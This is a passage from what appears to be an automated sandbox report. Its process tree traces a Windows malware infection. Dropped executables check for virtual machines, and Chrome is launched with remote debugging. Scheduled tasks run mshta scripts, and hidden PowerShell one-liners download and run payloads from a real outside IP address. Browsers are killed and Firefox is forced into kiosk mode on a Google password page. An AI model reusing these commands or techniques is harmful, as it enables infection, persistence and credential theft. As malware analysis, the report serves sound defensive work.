      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2cb9758,0x7fef2cb9768,0x7fef2cb9778
        6⤵
        
        PID:3056
      - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        6⤵
        
        PID:1088
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1372,i,6835571971181334130,2234028524339446051,131072 /prefetch:2
        6⤵
        
        PID:296
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1372,i,6835571971181334130,2234028524339446051,131072 /prefetch:8
        6⤵
        
        PID:1164
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1372,i,6835571971181334130,2234028524339446051,131072 /prefetch:8
        6⤵
        
        PID:2428
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2268 --field-trial-handle=1372,i,6835571971181334130,2234028524339446051,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2916
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2292 --field-trial-handle=1372,i,6835571971181334130,2234028524339446051,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2236
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2956 --field-trial-handle=1372,i,6835571971181334130,2234028524339446051,131072 /prefetch:2
        6⤵
        
        PID:3220
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1264 --field-trial-handle=1372,i,6835571971181334130,2234028524339446051,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3348
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3464 --field-trial-handle=1372,i,6835571971181334130,2234028524339446051,131072 /prefetch:8
        6⤵
        
        PID:3416
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3584 --field-trial-handle=1372,i,6835571971181334130,2234028524339446051,131072 /prefetch:8
        6⤵
        
        PID:3424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\v3e3o" & exit
        5⤵
        
        PID:2776
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:3988
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 556
      4⤵
      Loads dropped DLL
      Program crash
      PID:2628
- - C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
    "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2116
- - C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe
    "C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"
    3⤵
    - Executes dropped EXE
    PID:1668
- - C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe
    "C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2952
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2112
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7249758,0x7fef7249768,0x7fef7249778
        5⤵
        
        PID:2592
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:2316
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:2
        5⤵
        
        PID:2424
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:8
        5⤵
        
        PID:1592
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1520 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:8
        5⤵
        
        PID:324
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2296 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:756
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3000
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1448 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:2
        5⤵
        
        PID:1712
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1316 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2600
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3496 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:8
        5⤵
        
        PID:2664
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3512 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:8
        5⤵
        
        PID:2252
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3520 --field-trial-handle=1200,i,10413548670182641642,18327397300709676381,131072 /prefetch:8
        5⤵
        
        PID:1440
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\58gd2" & exit
      4⤵
      PID:2984
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:3220
- - C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe
    "C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    PID:1776
- - C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe
    "C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1692
- - C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
    "C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2616
- - C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
    "C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"
    3⤵
    PID:1156
  - - C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
      4⤵
      PID:872
    - - C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe"
        5⤵
        
        PID:2928
- - C:\Users\Admin\AppData\Local\Temp\1090673001\216d0f5bee.exe
    "C:\Users\Admin\AppData\Local\Temp\1090673001\216d0f5bee.exe"
    3⤵
    PID:2000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:3000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:2228
- - C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
    "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
    3⤵
    PID:484
  - - C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
      "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
      4⤵
      PID:3892
- - C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe
    "C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"
    3⤵
    PID:1580
- - C:\Users\Admin\AppData\Local\Temp\1091274101\a610ba87e1.exe
    "C:\Users\Admin\AppData\Local\Temp\1091274101\a610ba87e1.exe"
    3⤵
    PID:1712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn MfkxNmanDtd /tr "mshta C:\Users\Admin\AppData\Local\Temp\F9Ys9pT55.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      PID:1424
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn MfkxNmanDtd /tr "mshta C:\Users\Admin\AppData\Local\Temp\F9Ys9pT55.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2012
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\F9Ys9pT55.hta
      4⤵
      PID:2344
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XAJV6FGXCAEXHR0WXZ4GFLMOEVHUPLPT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1728
      - C:\Users\Admin\AppData\Local\TempXAJV6FGXCAEXHR0WXZ4GFLMOEVHUPLPT.EXE
        
        "C:\Users\Admin\AppData\Local\TempXAJV6FGXCAEXHR0WXZ4GFLMOEVHUPLPT.EXE"
        6⤵
        
        PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" "
    3⤵
    PID:3560
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" any_word
      4⤵
      PID:3640
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        Delays execution with timeout.exe
        
        PID:3672
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:3872
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3880
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:3960
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:4036
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4044
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "iYaTEmaxS9Q" /tr "mshta \"C:\Temp\xipmrHKCf.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2864
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\xipmrHKCf.hta"
        5⤵
        
        PID:584
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        
        PID:3352
- - C:\Users\Admin\AppData\Local\Temp\1091314001\61897168ed.exe
    "C:\Users\Admin\AppData\Local\Temp\1091314001\61897168ed.exe"
    3⤵
    PID:3596
- - C:\Users\Admin\AppData\Local\Temp\1091315001\7734f167b4.exe
    "C:\Users\Admin\AppData\Local\Temp\1091315001\7734f167b4.exe"
    3⤵
    PID:3460
- - C:\Users\Admin\AppData\Local\Temp\1091316001\60cad02928.exe
    "C:\Users\Admin\AppData\Local\Temp\1091316001\60cad02928.exe"
    3⤵
    PID:4008
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:4020
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:1612
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:1596
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:3272
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:2156
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:2908
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:2680
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2680.0.873609264\1595196672" -parentBuildID 20221007134813 -prefsHandle 1272 -prefMapHandle 1268 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d245fbcb-2cbb-41fa-8f8a-9157bc641a9e} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" 1368 10bd9158 gpu
        6⤵
        
        PID:1156
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2680.1.1401039998\258334427" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1516 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {16aad5f9-4d77-40b2-b303-57ad1ff92db4} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" 1548 41d5258 socket
        6⤵
        
        PID:1624
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2680.2.307482932\38476182" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e120cb25-4d5e-4e03-98e7-2c4a5f2b54ac} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" 2068 1a4e3a58 tab
        6⤵
        
        PID:3848
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2680.3.1905347760\963941463" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cf36e4a-4733-4d00-ab5f-6f3317bf4b5b} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" 2924 d5e158 tab
        6⤵
        
        PID:536
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2680.4.2025265872\1603897762" -childID 3 -isForBrowser -prefsHandle 3100 -prefMapHandle 3756 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd80e9eb-99b2-41db-b248-2e7a0ca388db} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" 3492 1eb1fb58 tab
        6⤵
        
        PID:3336
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2680.5.1575857613\2109986402" -childID 4 -isForBrowser -prefsHandle 1828 -prefMapHandle 3100 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a72c860-150c-4fc2-a167-7a7b150545b8} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" 3876 20556558 tab
        6⤵
        
        PID:2800
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2680.6.220969677\759428701" -childID 5 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 716 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4af54a6d-09cf-4561-8b02-cb4ddfbee050} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" 3992 20125558 tab
        6⤵
        
        PID:1056
- - C:\Users\Admin\AppData\Local\Temp\1091317001\102c899b72.exe
    "C:\Users\Admin\AppData\Local\Temp\1091317001\102c899b72.exe"
    3⤵
    PID:324
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn NPTN8maujAM /tr "mshta C:\Users\Admin\AppData\Local\Temp\TF4nG8o4A.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      PID:3364
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn NPTN8maujAM /tr "mshta C:\Users\Admin\AppData\Local\Temp\TF4nG8o4A.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3392
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\TF4nG8o4A.hta
      4⤵
      PID:3360
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZGN5VOCTWXBJLJ9YSV3VWCH92G2DETVK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:928
      - C:\Users\Admin\AppData\Local\TempZGN5VOCTWXBJLJ9YSV3VWCH92G2DETVK.EXE
        
        "C:\Users\Admin\AppData\Local\TempZGN5VOCTWXBJLJ9YSV3VWCH92G2DETVK.EXE"
        6⤵
        
        PID:3228
- - C:\Users\Admin\AppData\Local\Temp\1091318001\d7efae0799.exe
    "C:\Users\Admin\AppData\Local\Temp\1091318001\d7efae0799.exe"
    3⤵
    PID:1488
- - C:\Users\Admin\AppData\Local\Temp\1091319001\076818902f.exe
    "C:\Users\Admin\AppData\Local\Temp\1091319001\076818902f.exe"
    3⤵
    PID:1848
- - C:\Users\Admin\AppData\Local\Temp\1091320001\1a60a8d736.exe
    "C:\Users\Admin\AppData\Local\Temp\1091320001\1a60a8d736.exe"
    3⤵
    PID:2496
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:3640
- - C:\Users\Admin\AppData\Local\Temp\1091321001\763412ca15.exe
    "C:\Users\Admin\AppData\Local\Temp\1091321001\763412ca15.exe"
    3⤵
    PID:3792
- - C:\Users\Admin\AppData\Local\Temp\1091322001\5abe8b6709.exe
    "C:\Users\Admin\AppData\Local\Temp\1091322001\5abe8b6709.exe"
    3⤵
    PID:3468
- - C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe
    "C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe"
    3⤵
    PID:3144
- - C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe
    "C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe"
    3⤵
    PID:4040
- - C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
    "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
    3⤵
    PID:3544
  - - C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
      "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
      4⤵
      PID:484
- - C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe
    "C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe"
    3⤵
    PID:2276
- - C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe
    "C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe"
    3⤵
    PID:2000
- - C:\Users\Admin\AppData\Local\Temp\1091328001\b7bea63a45.exe
